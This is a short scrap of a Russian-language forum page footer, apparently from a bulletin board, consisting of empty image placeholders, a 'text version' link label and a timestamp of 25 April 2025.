![]() ![]() |
![]() |
Текстовая версия | Сейчас: 25 April 2025 - 19:56 |